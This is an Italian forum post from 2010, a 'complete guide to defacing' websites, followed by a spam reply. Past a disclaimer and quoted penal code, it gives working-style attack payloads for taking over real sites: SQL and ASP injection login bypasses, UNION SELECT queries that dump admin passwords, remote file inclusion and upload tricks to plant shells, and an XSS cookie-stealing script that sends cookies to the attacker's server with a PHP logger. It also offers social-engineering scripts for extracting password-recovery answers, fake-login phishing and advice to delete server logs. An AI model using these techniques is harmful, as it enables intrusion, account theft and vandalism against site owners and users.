Guida al deface, [completa!]

« Older   Newer »
  Share  
view post Posted on 18/4/2010, 18:58

Group:
,,,..--::|| AMMINISTRATORE ||::--..,,,
Posts:
1,602
Location:
Scheda di rete

Status:


Disclamer :
1)Io non mi ritengo responsabile dei danni arrecati e/o ricevuti dopo aver letto questa guida. Questa è una guida a puro scopo informativo
2) La guida si divide in due parti la prima in cui faccio ci sono gli esempi degli attacchi la seconda in cui spiego le varie tecniche (ogni tecnica è contrassegnata da un numero )
e alla fine c'è anche un mini vocabolario per chi è alle prime armi è non sa il significato di molte parole
3) so che Molto probabilmente questa parte nono verrà letta pero lo scrivo comunque : Gentilmente se posterete questa guida sul vostro sito/forum mettete l'autore ;
è deprimente trovare le proprie guide in giro per il web senza l'autore .Poi a volte capita addirittura che qualcuno vi accusi anche di non essere l'autore !
4)Alcuni di questi "esempi" sono stati presi da altre guide ( badate bene,ho detto ALCUNI ) e poi sono stati riformulati .
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Introduzione
Inizio introducendo un paio di concetti base su deface e own :
1) Nessun sistema è veramente sicuro in quanto dietro a un pc si trova sempre una persona e si sa, noi non siamo perfetti

2) per quanto rigurda l'hacking in italia : ART. 615 ter Codice Penale - Accesso abusivo a un sistema informatico o telematico
Chiunque abusivamente si introduce in un sistema informatico o telematico protetto da
misure di sicurezza ovvero vi si mantiene contro la volontà espressa o tacita di chi ha il
diritto di escluderlo, è punito con la reclusione fino a tre anni.
La pena è della reclusione da uno a cinque anni:
1) se il fatto è commesso da un pubblico ufficiale o da un incaricato di un pubblico servizio,
con abuso dei poteri o con violazione dei doveri inerenti alla funzione o al servizio o da
chi esercita anche abusivamente la professione di investigatore privato, o con abuso
della qualità di operatore del sistema;
2) se il colpevole per commettere il fatto usa violenza sulle cose o alle persone, ovvero se
è palesemente armato;
3) se dal fatto deriva la distruzione o il danneggiamento del sistema o l'interruzione totale o
parziale del suo funzionamento, ovvero la distruzione o il danneggiamento dei dati, delle
informazioni o dei programmi in essi contenuti.
Qualora i fatti di cui ai commi primo e secondo riguardino sistemi informatici o telematici
d'interesse militare o relativi all'ordine pubblico o alla sicurezza pubblica o alla sanità o alla
protezione civile o comunque di interesse pubblico, la pena è, rispettivamente, della
reclusione da uno a cinque anni e da tre a otto anni.
Nel caso previsto dal primo comma il delitto è punibile a querela della persona offesa; negli
altri casi si procede d'ufficio.

3)In Italia il defacing si traduce in tre tipi di reato grave previsti dal Codice Penale, quelli di accesso abusivo ad un sistema informatico e di diffamazione:

Art. 615 Ter (Accesso abusivo ad un sistema telematico o informatico): "Chiunque abusivamente si introduca in un sistema informatico
o telematico protetto da misure di sicurezza ovvero vi si mantenga contro la volontà espressa o tacita di chi ha il diritto di escluderlo è punito con la pena della reclusione fino a tre anni."
Art 635 bis (Danneggiamento di sistemi informatici e telematici): Chiunque distrugge, deteriora o rende, in tutto o in parte,
inservibili sistemi informatici o telematici altrui, ovvero programmi, informazioni o dati altrui, è punito, salvo che il fatto costituisca più grave reato, con la reclusione da sei mesi a tre anni.
Se ricorre una o più delle circostanze di cui al secondo comma dell'articolo 635, ovvero se il fatto è commesso con abuso della qualità di operatore del sistema, la pena è della reclusione da uno a quattro anni".
Art. 595 (Diffamazione) : Chiunque comunicando con più persone, offende l‘altrui reputazione, è punito con la reclusione fino ad un anno o con la multa sino a lire due milioni (circa 1032 €).
Se l’offesa consiste nell’attribuzione di un fatto determinato, la pena è della reclusione fino a due anni, ovvero della multa fino a lire quattro milioni (circa 2065 €).
Se l’offesa è arrecata col mezzo della stampa, o con qualsiasi altro mezzo di pubblicità, ovvero in atto pubblico,
la pena è della reclusione da sei mesi a tre anni o della multa non inferiore a lire un milione (circa 516 €)."

Definizione di :
1) DEFACE : Defacing (termine inglese che, come il suo sinonimo defacement, ha il significato letterale di "sfregiare, deturpare", in italiano reso raramente con defacciare)
nell'ambito della sicurezza informatica ha il significato di cambiare illecitamente la home page di un sito web (la sua "faccia") o modificarne, sostituendole, una o più pagine interne.
Tale pratica, condotta da parte di persone non autorizzate e all'insaputa di chi gestisce il sito, è illegale in tutti i paesi del mondo.
Un sito che è stato oggetto di deface vede sostituita la propria pagina principale, spesso insieme a tutte le pagine interne,
con una schermata che indica l'azione compiuta da uno o più cracker. Le motivazioni di tale atto vandalico possono essere di vario tipo, dalla dimostrazione di abilità a ragioni ideologiche.
(Wikipedia)
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Strumenti utili :
1) uno scanner di ip : superscan versione 3 è il migliore oppure spp scanner ( lo scanner degli spippolatori )
2) uno scanner per le vulnerabilità o anche piu di uno ( io consiglio nmap [versione grafica per i novellini] acunetix web vulnerability scanner [sembrerà strano ma ogni tanto è utile ]o anche SSS , per finire RFI tool
3) installate l'interpete in perl per gli exploit (si chiama active perl ) e il mambo
4) un proxy o anche piu di uno : torpack,jap,hide ip platinum,un web proxy qualsiasi,freecap oppure Xb-browser ( versione modificata di firefox che integra alcune utili funzionalità )
5) per firefox installate queste addons : add n edit cookies e torbutton
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Iniziamo :

1° caso )Asp injection (1)
www.sitoacazzodicane.it ci facciamo un giro per questo sito... e notiamo che ha una pagina di login !! www.sitoacazzodicane.it/Login.asp quindi (teoricamente, in caso sia vulnerabile) si può effettuare un asp injection
Proviamo ..... nick : admin
password : ' or '
......OK Siamo connessi come admin... e ora abbiamo accesso all'amministrazione del sito...

2° caso ) Sql injection (1)
molto simile al primo.. www.sitoacazzodicane2.it anche qui c'è una pagina di login ! pero non è in .asp www.sitoacazzodicane.it/login.html ok.. puo essere vulnerabile all'sql injection
proviamo nick :' or 0=0 --sp_password
password : nessuna
...... Ok !! anche qui siamo dentro l'amministrazione !!!

3° caso ) Rfi o anche Remote File Inclusion (2)
www.sitoacazzodicane3.it vediamo com'è strutturato questo sito : php dinamico ! www.sitoacazzodicane3.it/modules.php?name=prova
quindi sempre teoricamente è vulnerabile a un remote File Injection !!
proviamo ad uppare la shell www.sitoacazzodicane3.it/modules.ph.../c99.txt?cmd=ls
aspettiamo che uppa la shell.... Nessun errore ! ecco la nostra c99 uppata sul sito !! cerchiamo la index e modifichiamola oppure cerchiamo i file di configurazione dove è racchiuso il nick e la password dell'admin
e poi ci connettiamo via ftp .

4° caso ) Lfi o Local File Inclusion (2)
www.sitoacazzodicane4.com/forum haaaaaa un sito con un forum !! vediamo cosa utilizza..... Powered by phpbb .. ora proviamo a fare un lfi
carichiamo un immagine con dentro una shell come se dovessimo utilizzarla come un avatar poi apriamo il link per vederla e.. invece dell'immagine si vedra la shell !!
quindi ora possiamo fare tutto quello che vogliamo ! ( i siti devono essere per forz ain php seno nn si puo attuare questo tipo di attacco )

5° caso ) Exploit prima parte (3)
www.sitoacazzodicane5.com/forum anche qui un sito con un forum.....vediamo cosa utilizza powered by Ipb ( invision power board )
( normalmente la piattaforma usata e la versione sono alla fine del forum giu, sotto la lista degli utenti connessi )
usiamo un exploit in perl per ottenere la password in md5 dell'admin , normalmente i principali exploit sono scritti in perl quindi scarichiamo l'interprete pe ril perl e avviamo l'exploit cosi :
start/esegui/cmd poi scrivere perl C:\percorsofile\nomefile.pl e facciamo avvia.. se tutto è andato bene ci apparirà l'exploit e a quel punto basta seguire le istruzioni contenute all'intero
( di solito c'è anche un esempio per far capire come fare )


6° caso ) Exploit seconda parte (3)
www.sitoacazzodicane6.com/forum anche qui un sito con un forum.....vediamo cosa utilizza powered by Ipb ( invision power board )
Potremmo utilizzare degli exploit che contengono una stringa SQL Injection per il Form del Search .
scriviamo nel modulo di ricerca questa stringa: p0hh0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/* e avremo le pwd in md5.
anche il bug che affligge il modulo Top10 è famoso :
www.sitoacazzodicane5.it/phpNuke/modules.php?name=Top&querylang=%20WHERE%201=2%20UNION%20ALL%20SELECT%201,pwd,1,1%20FROM%20nuke_authors
andiamo su search, Top10 e ora su barra degli indirizzi: http://sitoacazzodicane6/admin.php?foo=bar...in=eCcgT1IvKjp5. Se vedremo come risultato "Selection from the database failed!" allora siamo dentro…
Ora non resta che creare un user con privilegi da admin.
http://sito_vittima/admin.php?op=AddAuthor...0VMRUNUIDEvKjox. Premete invio e avremo creato un nuovo account con poteri illimitati.


7° caso ) Exploit terza parte (3)
Stesso esempio del quinto caso pero invece di avvirare direttamente l'exlpoit avviamo un Mteasploit
Il Metasploit non è considerato un tipo di attacco ma piu che altro un ambiente di sviluppo progettato per testare la sicurezza dei nostri server ( nostri o di altri )
Contiene quasi 200 exploit dedicati al penetration test del proprio server ; è in continuo
aggiornamento e viene appoggiato da molti , in quanto quest'applicazione è opensource ( sotto copyleft )


8° caso ) Cross Site Scripting xss (4)
www.sitoacazzodicane7.net/index.php/page=index.html questo sito è protetto protettissimo !! dite voi.. e allora come si fa ?
Utilizzeremo il Cross Site Scripting: Questa tecnica, chiamata anche XSS, è una vulnerabilità che affligge i siti con scarso controllo delle variabili nei form di ricerca,
o in un qualsiasi form in cui ci sia un input da parte dell'utente . Ovviamente ci devono essere per forza dei campi di input ( tranne se utilizzaremo un mp con un relink al codice o altro )
L'xss ha molte funzioni ma noi lo utilizzeremo per grabbare i cookie dell'admin.Bisogna inserisce il codice javascript maligno o nella barra degli indirizzi o nel modulo Search.
Oppure mandare un messaggio all'admin in cui metteremo un link contraffatto che relinki alla pagina dove si trova il codice maligno , in ultimo si potrebbe inserire il relink dentro un immagine,
oppure direttamente il codice in javascript ( per fare prima )

<script>alert(/xss By Babbudoyu/)</script> permette di far apparire un semplice alert in javascript con dentro la frase che hai scelto, in questo caso xss By Babudoyu . ( Praticamente inutile )

<script>(document.cookie)</script> grabba i TUOI cookie ( anche questo è praticamente inutile in quanto i miei cookie li so gia xd )
Eesmpio : www.sitoacazzodicane8.it/index.php/page<script>(document.cookie)</script> vedremo un alert con i nostri cookie e il nostro SID.
ma per avere i cookie di altri utenti come l'admin ?

Per i cookie dell'admin dobbiamo fare un semplice redirect che appunto redirecta l'admin al nostro cookie grabber (5)

Codice del Redirect :
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
location.href='http://www.linkalnostrocookiegrabber?cookie='+escape(document.cookie)
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
e salviamo in nomechevuoitu.js.

Codice del Cookie grabber:
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
<?php
$cookie = $_GET['cookie'];
$ip = getenv("REMOTE_ADDR");
$ref=$_SERVER['HTTP_REFERER'];
$data = date('j/n/y - H:i') ;
$cookielog = "cookielog.html";

// echo $cookie;

$msg="\nCookie:$cookie Ip Address: $ip HTTPREF: $ref DATA: $data";

$file = fopen($cookielog, 'a');
$write = fwrite($file, $msg);
$close = fclose($file);

?>
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Questo codice lo rinomineremo log.php, e hosteremo tutto su un nostro spazio web..Altervista è molto semplice da usare ^ ^

Ora andiamo a creare il file index.php
Codice della index
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
<?
$sito = "http://www.Sitoacazzodicane9.com/ricerca?tipo=artista&ricerca=<script>document.location="http://www.link dovesi trovail file nomechevuoitu.js"</script>";
print '
<meta HTTP-EQUIV="Refresh" CONTENT="1; URL='.$sito.'">
';
?>
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

Ora, Se l'admin clicca sul nomechevuoitu.js viene portato al cookie grabber.Non ci resta che prelevare i file di log creati e cambiare i nostri cookie con quelli dell'admin..usando add n edit cookies ( con Firefox)


9° caso ) Social Engineer (6)
abbiamo un sito tipo www.cicciobello.com con una pagina di login che pero non è vulnerabile all'sql injection ..
poi c'è anhce una pagina di recupero delle password dove chiede di inserire alcuni dati per ottenere una nuova password
Qui entra in gioco la nostra perversa mente : non utilizzeremo niente di quello che ho scritto sopra , utilizzeremo l'intelligenza e la bastardaggine che contraddistinguono gli umani dagli altri esseri presenti sulla terra
esempio :
(conversazione )
ATTACCANTE : Ciao ! il tuo sito è molto ben curato ! , contiene moltissime informazioni che non ho trovato in nessun'altra parte nel web !!
VITTIMA : si in effetti è molto ben fatto , grazie
ATTACCANTE: ma da quanto tempo è attivo ?
VITTIMA : poco circa 3 mesi..
ATTACCANTE: quindi sta ancora cercando staff ?
VITTIMA : certo
ATTACCANTE : senti io sono molto bravo in ( un argomento qualsiasi es. informatica , giochi , grafica o altro ) ho notato che in quell'argomento voi siete un po carenti vi posso dare una mano ?
VITTIMA : certo , mi stai simpatico ti metto subito admin/mod pero mi raccomando posta molta roba
ATTACCANTE : certo grazie amico
VITTIMA : non c'è di che xd

... a quel punto la vittima puo dire addio al suo sito.. siamo admin o mod ( dipende dalla vostra bravura )

altro esempio : ( carpire informazioni ) ok .. vediamo il nick dell'admin andiamo nella pagina del recupero delle password e vediamo di che info abbiamo bisogno :
nome ,cognome.data di nascita,provincia e Luogo di nascita della madre . Ok iniziamo
ATTACCANTE : piacere io sono Tizio vengo da xxxxx ed ho 14 anni,
VITTIMA : piacere io Sono Sempronio e vengo da xx ed ho 16 anni ( ok gia abbiamo un po di info : il nome, la citta di provenienza e gli anni )
Attaccante : Ho visto il tuo sito molto bello
VITTIMA : si grazie pero è ancora da finire
ATTACCANTE : senti ma come mai vivi a xx? cioe ci sei nato oppure..... perchè io conosco una persona che vive li... cosi volevo sapere se lo conoscevi (ovviamente è una bugia )
Vittima : io vivo qui perchè i miei genitori sono nati qui cmq come si chiama il tuo amico ?
ATTACCANTE : scusa dimmi il tuo cognome che sto parlando ora con il mio amico cosi vedo se ti conosce
Vittima : IL mio cognome è Aranzulla ( asdasdasdasdddddd )
Fine conversazione sappiamo tutto quello che ci serve per avere la nuova password del suo account


10° caso ) Cross Frame Scripting o Cfs (7)
www.sitoacazzodicane10.net/modules....name=index.html uhmm questo sito ASSOMIGLIA ad un sito vulnerabile al rfi però è in .asp quindi nn si puo fare nulla ( per il rfi/lfi )
pero possiamo provare a fare un cfs !! www.sitoacazzodicane10.net/modules....//www.google.it perfetto !! si vede la pagina di google dentro quella del nostro sito !!
uhmm come possiamo sfruttare questo bug ? Semplice !! utilizziamo un relink ad una nostra pagina dove si trova un fake login
www.sitoacazzodicane10.net/modules....iemergenza.html ( ci scriviamo 2 stronzate tipo che ci sono problemi con la pagina di login originale ) e poi mandiamo questo link
a tutti gli utenti tramite messaggio o tramite e-amil chiedendo scusa dell'incoveniente e chiedendo di accedere da li .. ok abbiamo le pass di molti utenti... ( molto probabilmente anche di alcuni mod ) utilizziamo
l'account di un mod o di un utente per fare un po di social all'admin e siamo dentro !


11° caso ) Account di posta elettronica : (8)
www.sitoacazzodicane11.com dove ci sono le email degli admin ok.. proviamo a fare un brute force o altro........
metodo che io CONSIGLIO solo a quelli che : 1 ) hanno voglia di perdere tempo 2) hanno una connessione T1 o T3.


12° caso ) Bruteforce di password e nick dell'account ftp (8)
www.sitoacazzodicane12.net
Scaricate un bruteforce e sperate di avere un culo della madonna per trovare il nick e la pass dell'admin
anche qui dico le stesse cose che ho detto sopra metodo che io CONSIGLIO solo a quelli che : 1 ) hanno voglia di perdere tempo 2) hanno una connessione T1 o T3.


13° caso ) Bucare un server mooolto vecchio
http:www.sitoacazzo.net facciamo un finger e notiamo che il server è moolto vecchio ( risale al 1990 ) quindi probabilmente questo trucco puo funzionare :
se il server è molto vecchio si può ricorrere ad un piccolo trucco , il trucco del quote
connettetevi via ftp e scrivete : >quote user ftp
User name OK send password.
>quote cwd ~root
se tutto è andato come speriamo siamo connessi come root !! ed abbiamo un server tutto nostro xD.

14° caso ) Vulnerability Scanner
abbiamo un sito tipo www.bastacoicazzidicane.net e non sappiamo proprio dove sbattere la testa.. in questo caso ci vengono in aiuto gli scanner di vulnerabilità !!
Apriamo uno scanner tipo nmap inseriamo i valori per la scansione e il sito da "scannare" e facciamo ok...... dopo un po vedremo i file di log.... HOHOOOOO questo sito ha la porta 139 aperta e anche la 12345
( MOOOOOOLto improbabile pero puo sempre capitare xD ) ora facciamo start/esegui e scriviamo //ip del server se tutto andrà bene siamo connessi !! ed ora ci divertiamo , condividiamo le varie unita e altro e poi
ci facciamo un giro dentro il server cancellando i file di log e prelevando le info che ci servono dal database o modificando la index.


15° caso ) GuestBook
www.babbudoyu2.it uhmm facciamoci un giro.....su questo sito è installato un guestbook ! Il Guestbook è un'utilità che permette ai visitatori di poter lasciare firme e commenti.
Nel campo dell'Username inseriamo:
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
'or 'jr7'='jr7' /*
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
mentre nel campo della Password mettiamo una pass a piacere... se il sito è vulnerabile siamo loggati come admin


16° caso ) MKPortal + vBulletin 3.5.4
www.sitovittima.it hahaaa in questo sito c'è un forum che utilizza vBullettin vers.3.5.4 !!
A questo punto basta aggiungere questo codice nell'url :
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
"ind=',userid='1"
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
senza apici,il risultato sarà:
www.sitoacazzodicane.it/index.php?ind=',userid='1
Se tutto è andato bene siete admin
Aggiornando la pagina ritornerete ad essere utenti normali quindi nn aggiornate.


17° caso ) Cookie Manipulation per Phbb 1.0.12
Con questa tecnica ci concentreremo sui forum in PhpBB. Esiste un semplice exploit con il quale possiamo diventare admin di un forum. Per questa tecnica si consiglia l'uso di Firefox
Cercate su Google "Powered By phpBB 1.0.12." e trovate un sito vulnerabile a questo punto andate su C:/Documents and Settings/Vostro computer/Dati e applicazioni/Mozilla firefox/"
poi andate sulla cartella con numeri e lettere e poi sul file Cookie.txt e premete CTRL+T e per la ricerca inserite il sito in questione , cercate la stringa "phpbb2mysql_data" se c'èvuol dire che il sito è vulnerabile
(ma potrebbe anche non esserlo ) individuate il "codice guest" e se trovate "a%3A07B" modificatelo con "a%3A27Bs%3A1122autologinid%22%3Bb%3A1%3A622userid% 22%3A1222%227D"
(se trovate già questo codice il sito non è vulnerabile)
..adesso aggiornate la pagina e dovreste essere amministratori


18° caso )FrontPage
esempio www.babbudoyu.it ......che bel sito !! però c'è installato frontpage !!
Vediamo come possiamo diventare admin ......Con queste due stringhe possiamo vedere le pass degli admin.
Esempio :
www.sitovittima.it/_vti_pvt/administrators.pwd
oppure
www.sitovittima.it/_vti_inf.html

19° caso ) JPORTAL
www.unaltrositoacazzo.it bel sito.. molto ben fatto. Sembra senza falle ma... usa Jportal !
Quindi basta inserire nella barra degli indirizzi, questo codice:
Codice
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
print.php?what=article&id=X AND 1=0 UNION SELECT id,id,nick,pass,id,id,id,id,id from admins LIMIT 1
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Vedete la X? Lì dovete inserire il numero 1 o 2 ( dipende dalla pas di quale utente/admin/mod cercate ).
Se il bug non è stato fixato vedremo le pass degli admin NON hashate quindi poi basta loggarsi e siamo admin.


20° caso )Simple Machines Forum
www.sitoacazzodicavallo.net/forum uhfff un altro forum bastaaaa xdd questo forum è in Smf
Bene controllate se l'uploader degli allegati sia attivo... se si possiamo iniziare.....
Rinominate la vostra shell in nomechevuoi.php.zip (ATTENZIONE, non mettete la shell in un archivio ma RINOMINATELA)
Uploadatela normalmente tramite l'uploader degli allegati di SMF
ora, se siete fortunati, l'admin non ha abilitato l'opzione encrypt filenames e quindi potete trovare la vostra shell qui: http://Sitovittima.com/path/attachments/shell.php.zip
Sembra incredibile ma il server interpreta quel file come un file in .php !!!! Molti server sono vulnerabili e quindi molti uploader...
autori : The-Dark_Man && NexeN ( modificata da me )


21° caso ) Phbb3 Remote command execution
Molti mi hanno chiesto come sia possibile hackerare un ofrum in phpbb3 l'unica cosa che ho scoperto per il momento che è possibile effettuare un rce,
Il Bug si trova in :
- Private Messages ( messaggi privati )
- Posting ( discussioni )
- Signature ( nella firma )
non so se questo bug è stato fixato quindi .. provate


xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Tecniche Di Intrusione
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx


ASP INJECTION (1)
l'ASP injection fa parte della famiglia dei code injection, ossia consiste nell'iniettare del codice maligno nel modulo vulnerabile in modo da ottenere l'accesso come r00t(o admin) nel sito vulnerabile.


SQL INJECTION (2)
Anche l'Sql injection fa parte della famiglia dei code injection,, cioè consiste nell'iniettare del codice maligno nel modulo vulnerabile in modo da ottenere l'accesso come r00t(o admin) nel sito vulnerabile.


Remote File Inclusion e Local File Inclusion (3)
Il Remote File Inclusion non è altro che la capacità di includere in una pagina dianmica una pagina a nostro piacimento.
(notate bene che la pagina da includere non deve essere della stessa estensione nè deve essere dinamica per esempio su una pagina .php possiamo uploadare una pagina .html e non una .asp altrimenti diventerebbe un Local File Inclusion)
Saranno fondamentali due comandi in questa operazione il comando GET(che imposta una variabile) e il comando INCLUDE(che servirà per includere la pagina da noi scelta)(entrambi i comandi si trovano nella pagina vulnerabile di conseguenza voi non dovrete usarli).


EXPLOIT (4)
Un exploit è un termine usato in informatica per identificare un metodo che, sfruttando un bug o una vulnerabilità, porta all'acquisizione di privilegi o al denial of service di un computer.
Ci sono diversi modi per classificare gli exploit. Il più comune è una classificazione a seconda del modo in cui l'exploit contatta l'applicazione vulnerabile.
Un exploit remoto è compiuto attraverso la rete e sfrutta la vulnerabilità senza precedenti accessi al sistema.
Un exploit locale richiede un preventivo accesso al sistema e solitamente fa aumentare i privilegi dell'utente oltre a quelli impostati dall'amministratore.
Gli exploit possono anche essere classificati a seconda del tipo di vulnerabilità che sfruttano.
Vedi buffer overflow, Heap Overflow, format string attacks, race condition, double free(), Integer overflow, sql injection, cross-site scripting e cross-site request forgery.
Lo scopo di molti exploit è quello di acquisire i privilegi di root su un sistema.
È comunque possibile usare exploit che dapprima acquisiscono un accesso con i minimi privilegi e che poi li alzano fino ad arrivare a root.
Normalmente un exploit può sfruttare solo una specifica falla e quando è pubblicato questa falla è riparata e l'exploit diventa obsoleto per le nuove versioni del programma.
Per questo motivo alcuni blackhat hacker non divulgano gli exploit trovati ma li tengono riservati per loro o per la loro comunità. Questi exploit sono chiamati zero day exploit,
e scoprire il loro contenuto è il più grande desiderio per gli attacker senza conoscenze, altrimenti detti script kiddie.

Fonte:N/D


Cross Site Scripting (4)
Le XSS fanno parte della famiglia dei code injection..ossia consistono nell'iniezione di codice nella pagina vulnerabile attraverso degli script in javascript.


Cookie Grabber (5)
I cookie sono applicazioni che contengono informazioni sull’utente che visita un sito, essi possono essere impostati per sessione rimanendo nella memoria di sistema fino alla chiusura del browser oppure,
possono avere una determinata scadenza o essere permanenti e in tal caso vengono salvati in una specifica cartella nel computer.
Il cookie grabber è uno "strumento" che serve a grabbare o rubare(per questo detto anke cookie stealer) i cookie.


Social Engineering (6)
Il social engineering è una tecnica ke consiste nel socializzare con le persone e farsele amike al fine di ottenere accesso a ciò ke ci interessa.

CrossFrameScripting (7)Il CFS(o cross frame scripting)
è una vulnerabilità dei frame di una pagina che permette di sostituire il frame vunerabile con un altro a nostra scelta o addirittura con un pagina esterna.


Bruteforce (8)
Il bruteforce(attacco di forza bruta) consiste in attacchi da dizionario cioè provando una lista di password fino a ke non trova la password d'accesso al sistema che vogliamo forzare.
 
Web     Top
fotomaton bodas murcia
view post Posted on 27/12/2014, 07:15




I know the entry is old, but I wanted to congratulate you on your writing.. I liked the blog, I happened to see what new entries in it. Luck and not to give up, because the blog is a luxury. A kiss !!
 
Top
1 replies since 18/4/2010, 18:58   11907 views
  Share